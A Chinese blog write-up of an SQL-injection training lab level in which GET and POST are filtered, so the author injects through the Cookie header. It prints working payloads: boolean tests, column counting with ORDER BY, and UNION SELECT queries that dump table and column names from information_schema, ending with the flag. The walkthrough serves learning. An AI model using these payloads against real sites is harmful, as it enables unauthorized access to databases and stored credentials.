网络信息安全攻防学习平台 注入关第八

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

题目提示过滤了get和post,也就是说,浏览器中的url输入框等东东是不用考虑了,所以我们可以考虑下   请求头中cookie注入。


and 1=1 
and 1=2

常规注入测试,结果很明显

那么我们就开始order  by


order by 4
order by 3

可以测出来是3个字段

联合查询一下是爆出来2,3


顺手查一下数据库


用这个

Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3

爆出数据库 manager_sqli8,   sae_user_sqli8


Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655F6D616E616765725F73716C6938),3

我们先查一下sae_manager_sqli8

因为sae_user_sqli8我查过了。。里面没有啊

爆出id,username,password

答案出来了

IamFlagCookieInject!

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容